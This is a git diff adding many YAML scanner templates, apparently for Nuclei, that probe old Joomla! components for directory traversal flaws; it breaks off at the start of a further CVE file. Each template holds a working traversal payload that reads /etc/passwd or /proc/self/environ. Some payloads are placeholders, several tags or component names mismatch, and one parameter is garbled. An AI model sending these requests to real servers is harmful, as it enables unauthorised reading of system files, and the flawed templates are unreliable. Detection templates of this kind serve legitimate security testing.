diff --git a/cves/2007/CVE-2007-4504.yml b/cves/2007/CVE-2007-4504.yml new file mode 100644 index 0000000000..530d923bce --- /dev/null +++ b/cves/2007/CVE-2007-4504.yml @@ -0,0 +1,27 @@ +id: CVE-2007-4504 + +info: + name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + reference: | + - https://www.exploit-db.com/exploits/4307 + - https://www.cvedetails.com/cve/CVE-2007-4504 + tags: cve,cve2007,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=..|index.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2008/CVE-2008-4764.yml b/cves/2008/CVE-2008-4764.yml new file mode 100644 index 0000000000..33cee1d111 --- /dev/null +++ b/cves/2008/CVE-2008-4764.yml @@ -0,0 +1,27 @@ +id: CVE-2008-4764 + +info: + name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + reference: | + - https://www.exploit-db.com/exploits/5435 + - https://www.cvedetails.com/cve/CVE-2008-4764 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2008/CVE-2008-6080.yml b/cves/2008/CVE-2008-6080.yml new file mode 100644 index 0000000000..0fe05fb3b6 --- /dev/null +++ b/cves/2008/CVE-2008-6080.yml @@ -0,0 +1,27 @@ +id: CVE-2008-6080 + +info: + name: Joomla! Component ionFiles 4.4.2 - File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/6809 + - https://www.cvedetails.com/cve/CVE-2008-6080 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2008/CVE-2008-6222.yml b/cves/2008/CVE-2008-6222.yml new file mode 100644 index 0000000000..5e11c820df --- /dev/null +++ b/cves/2008/CVE-2008-6222.yml @@ -0,0 +1,27 @@ +id: CVE-2008-6222 + +info: + name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/6980 + - https://www.cvedetails.com/cve/CVE-2008-6222 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2009/CVE-2009-1496.yml b/cves/2009/CVE-2009-1496.yml new file mode 100644 index 0000000000..9944f21d49 --- /dev/null +++ b/cves/2009/CVE-2009-1496.yml @@ -0,0 +1,27 @@ +id: CVE-2009-1496 + +info: + name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/8367 + - https://www.cvedetails.com/cve/CVE-2009-1496 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-2015.yml b/cves/2009/CVE-2009-2015.yml new file mode 100644 index 0000000000..c311b2f97c --- /dev/null +++ b/cves/2009/CVE-2009-2015.yml @@ -0,0 +1,27 @@ +id: CVE-2009-2015 + +info: + name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/8898 + - https://www.cvedetails.com/cve/CVE-2009-2015 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2009/CVE-2009-2100.yml b/cves/2009/CVE-2009-2100.yml new file mode 100644 index 0000000000..ded50fcd6b --- /dev/null +++ b/cves/2009/CVE-2009-2100.yml @@ -0,0 +1,27 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion= [-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-3053.yml b/cves/2009/CVE-2009-3053.yml new file mode 100644 index 0000000000..7d8b0146da --- /dev/null +++ b/cves/2009/CVE-2009-3053.yml @@ -0,0 +1,27 @@ +id: CVE-2009-3053 + +info: + name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. + reference: | + - https://www.exploit-db.com/exploits/9564 + - https://www.cvedetails.com/cve/CVE-2009-3053 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2009/CVE-2009-3318.yml b/cves/2009/CVE-2009-3318.yml new file mode 100644 index 0000000000..057db7e66e --- /dev/null +++ b/cves/2009/CVE-2009-3318.yml @@ -0,0 +1,27 @@ +id: CVE-2009-3318 + +info: + name: Joomla! Component com_album 1.14 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/9706 + - https://www.cvedetails.com/cve/CVE-2009-3318 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=/../.." + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-4202.yml b/cves/2009/CVE-2009-4202.yml new file mode 100644 index 0000000000..c9f6c7d875 --- /dev/null +++ b/cves/2009/CVE-2009-4202.yml @@ -0,0 +1,27 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2009/CVE-2009-4679.yml b/cves/2009/CVE-2009-4679.yml new file mode 100644 index 0000000000..5311cefc3c --- /dev/null +++ b/cves/2009/CVE-2009-4679.yml @@ -0,0 +1,27 @@ +id: CVE-2009-4679 + +info: + name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/33440 + - https://www.cvedetails.com/cve/CVE-2009-4679 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0157.yml b/cves/2010/CVE-2010-0157.yml new file mode 100644 index 0000000000..022b4550bf --- /dev/null +++ b/cves/2010/CVE-2010-0157.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0157 + +info: + name: Joomla! Component com_biblestudy - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + reference: | + - https://www.exploit-db.com/exploits/10943 + - https://www.cvedetails.com/cve/CVE-2010-0157 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-0467.yml b/cves/2010/CVE-2010-0467.yml new file mode 100644 index 0000000000..563c3c96c0 --- /dev/null +++ b/cves/2010/CVE-2010-0467.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0467 + +info: + name: Joomla! Component CCNewsLetter - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + reference: | + - https://www.exploit-db.com/exploits/11282 + - https://www.cvedetails.com/cve/CVE-2010-0467 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0696.yml b/cves/2010/CVE-2010-0696.yml new file mode 100644 index 0000000000..db109c5d00 --- /dev/null +++ b/cves/2010/CVE-2010-0696.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0696 + +info: + name: Joomla! Component Jw_allVideos - Arbitrary File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/11447 + - https://www.cvedetails.com/cve/CVE-2010-0696 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-0759.yml b/cves/2010/CVE-2010-0759.yml new file mode 100644 index 0000000000..991d5572b1 --- /dev/null +++ b/cves/2010/CVE-2010-0759.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0759 + +info: + name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + reference: | + - https://www.exploit-db.com/exploits/11498 + - https://www.cvedetails.com/cve/CVE-2010-0759 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0942.yml b/cves/2010/CVE-2010-0942.yml new file mode 100644 index 0000000000..1470985d87 --- /dev/null +++ b/cves/2010/CVE-2010-0942.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-0942 + +info: + name: Joomla! Component com_jvideodirect - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11089 + - https://www.cvedetails.com/cve/CVE-2010-0942 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0972.yml b/cves/2010/CVE-2010-0972.yml new file mode 100644 index 0000000000..4c761145f4 --- /dev/null +++ b/cves/2010/CVE-2010-0972.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0972 + +info: + name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11738 + - https://www.cvedetails.com/cve/CVE-2010-0972 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0982.yml b/cves/2010/CVE-2010-0982.yml new file mode 100644 index 0000000000..0c398588a0 --- /dev/null +++ b/cves/2010/CVE-2010-0982.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-0982 + +info: + name: Joomla! Component com_cartweberp - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/10942 + - https://www.cvedetails.com/cve/CVE-2010-0982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1056.yml b/cves/2010/CVE-2010-1056.yml new file mode 100644 index 0000000000..104d6ccc3d --- /dev/null +++ b/cves/2010/CVE-2010-1056.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1056 + +info: + name: Joomla! Component com_rokdownloads - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11760 + - https://www.cvedetails.com/cve/CVE-2010-1056 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1081.yml b/cves/2010/CVE-2010-1081.yml new file mode 100644 index 0000000000..4c4670d529 --- /dev/null +++ b/cves/2010/CVE-2010-1081.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-1081 + +info: + name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11511 + - https://www.cvedetails.com/cve/CVE-2010-1081 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1217.yml b/cves/2010/CVE-2010-1217.yml new file mode 100644 index 0000000000..0c3d2b0c26 --- /dev/null +++ b/cves/2010/CVE-2010-1217.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-1217 + +info: + name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE: the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + reference: | + - https://www.exploit-db.com/exploits/11814 + - https://www.cvedetails.com/cve/CVE-2010-1217 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jeformcr&view={LFI}%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1302.yml b/cves/2010/CVE-2010-1302.yml new file mode 100644 index 0000000000..e3e0f264d3 --- /dev/null +++ b/cves/2010/CVE-2010-1302.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1302 + +info: + name: Joomla! Component DW Graph - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11978 + - https://www.cvedetails.com/cve/CVE-2010-1302 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dwgraphs&controller={lfi}%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-1340.yml b/cves/2010/CVE-2010-1340.yml new file mode 100644 index 0000000000..16e7ca875a --- /dev/null +++ b/cves/2010/CVE-2010-1340.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1340 + +info: + name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/33797 + - https://www.cvedetails.com/cve/CVE-2010-1340 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1461.yml b/cves/2010/CVE-2010-1461.yml new file mode 100644 index 0000000000..13660c3ae8 --- /dev/null +++ b/cves/2010/CVE-2010-1461.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1461 + +info: + name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12232 + - https://www.cvedetails.com/cve/CVE-2010-1461 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-1469.yml b/cves/2010/CVE-2010-1469.yml new file mode 100644 index 0000000000..d06c195c18 --- /dev/null +++ b/cves/2010/CVE-2010-1469.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1469 + +info: + name: Joomla! Component JProject Manager 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12146 + - https://www.cvedetails.com/cve/CVE-2010-1469 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1478.yml b/cves/2010/CVE-2010-1478.yml new file mode 100644 index 0000000000..850f9aa938 --- /dev/null +++ b/cves/2010/CVE-2010-1478.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-1478 + +info: + name: Joomla! Component Jfeedback 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12145 + - https://www.cvedetails.com/cve/CVE-2010-1478 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1491.yml b/cves/2010/CVE-2010-1491.yml new file mode 100644 index 0000000000..d247b95fe5 --- /dev/null +++ b/cves/2010/CVE-2010-1491.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1491 + +info: + name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12318 + - https://www.cvedetails.com/cve/CVE-2010-1491 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1540.yml b/cves/2010/CVE-2010-1540.yml new file mode 100644 index 0000000000..b0afe05f6e --- /dev/null 
+++ b/cves/2010/CVE-2010-1540.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1540 + +info: + name: Joomla! Component com_blog - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: | + - https://www.exploit-db.com/exploits/11625 + - https://www.cvedetails.com/cve/CVE-2010-1540 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1603.yml b/cves/2010/CVE-2010-1603.yml new file mode 100644 index 0000000000..dc2b52c09b --- /dev/null +++ b/cves/2010/CVE-2010-1603.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1603 + +info: + name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12284 + - https://www.cvedetails.com/cve/CVE-2010-1603 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1653.yml b/cves/2010/CVE-2010-1653.yml new file mode 100644 index 0000000000..4313ef2ea4 --- /dev/null 
+++ b/cves/2010/CVE-2010-1653.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1653 + +info: + name: Joomla! Component Graphics 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. + reference: | + - https://www.exploit-db.com/exploits/12430 + - https://www.cvedetails.com/cve/CVE-2010-1653 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1658.yml b/cves/2010/CVE-2010-1658.yml new file mode 100644 index 0000000000..6ddb4c7fcf --- /dev/null +++ b/cves/2010/CVE-2010-1658.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1658 + +info: + name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12427 + - https://www.cvedetails.com/cve/CVE-2010-1658 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-1715.yml b/cves/2010/CVE-2010-1715.yml new file mode 100644 index 0000000000..46d27a2dc0 --- /dev/null +++ b/cves/2010/CVE-2010-1715.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1715 + +info: + name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. + reference: | + - https://www.exploit-db.com/exploits/12174 + - https://www.cvedetails.com/cve/CVE-2010-1715 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1873.yml b/cves/2010/CVE-2010-1873.yml new file mode 100644 index 0000000000..8be5d8b989 --- /dev/null +++ b/cves/2010/CVE-2010-1873.yml 
